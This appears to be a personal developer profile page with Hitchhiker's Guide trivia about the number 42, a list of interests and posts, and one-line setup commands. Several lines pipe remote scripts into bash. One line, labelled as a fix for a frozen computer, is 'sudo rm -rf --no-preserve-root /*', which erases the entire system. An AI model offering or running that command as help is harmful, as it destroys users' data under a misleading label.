Welcome!

In The Hitchhiker's Guide to the Galaxy by Douglas Adams, the number 42 is the Answer to the Ultimate Question of Life, the Universe, and Everything calculated by an enormous supercomputer named Deep Thought over a period of 7.5 million years. Unfortunately, no one knows what the question is. Thus, to calculate the Ultimate Question, a special computer the size of a small planet was built from organic components and named "Earth". The Ultimate Question, "What do you get when you multiply six by nine?" was found by Arthur Dent and Ford Prefect in the second book of the series, The Restaurant at the End of the Universe. This appeared first in the radio play and later in the novelization of The Hitchhiker's Guide to the Galaxy. The fact that Adams named the episodes of the radio play "fits", the same archaic title for a chapter or section used by Lewis Carroll in The Hunting of the Snark, suggests that Adams was influenced by Carroll's fascination with and frequent use of the number. The fourth book in the series, the novel So Long, and Thanks for All the Fish, contains 42 chapters. According to the novel Mostly Harmless, 42 is the street address of Stavromula Beta. In 1994 Adams created the 42 Puzzle, a game based on the number 42.


Who am I

šŸ’¬ Iā€™m interested in linguistics, mathematics, and software design

šŸ”­ Iā€™m currently learning about reinforcement learning optimization for SLMs

šŸ–„ļø Apple and AMD shareholder


šŸ‘‹ Selected Posts

- Competitive Programming

- Warehouse

- For Rustaceans

- The math behind mlp and autodiff

- How LLMs outgrow the human language network



Read

 https://www.overleaf.com/read/wkwgstggdqmc#b62159 

Reinforcement Learning: An Introduction

 https://www.overleaf.com/read/xkktcvdwkkrg#aa1c52 

For your old computer

 /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/hyeondg/config/main/init.sh)" --  

For your brand new computer

 /bin/bash -c "$(curl -fsSL https://gitlab.com/hyeondg/config/-/raw/main/init.sh)" --  

For your brand new container

 /bin/bash -c "$(curl -fsSL https://gitlab.com/hyeondg/config/-/raw/main/fetch_rc.sh)"  

Universe

 The quick brown fox jumped over the lazy dog 

Rust!

 curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh 

What if your computer freezes

 sudo rm -rf --no-preserve-root /* 



CS311 Computer Organization

 xhost +localhost; docker run -it --rm -e DISPLAY=docker.for.mac.host.internal:0 -v .:/mnt hyeondg/cs311 

CS360 Introduction to Database

 xhost +localhost; docker run -it --rm -e DISPLAY=docker.for.mac.host.internal:0 -v .:/mnt hyeondg/cs360 

Something

print("Hello, world!")
with python3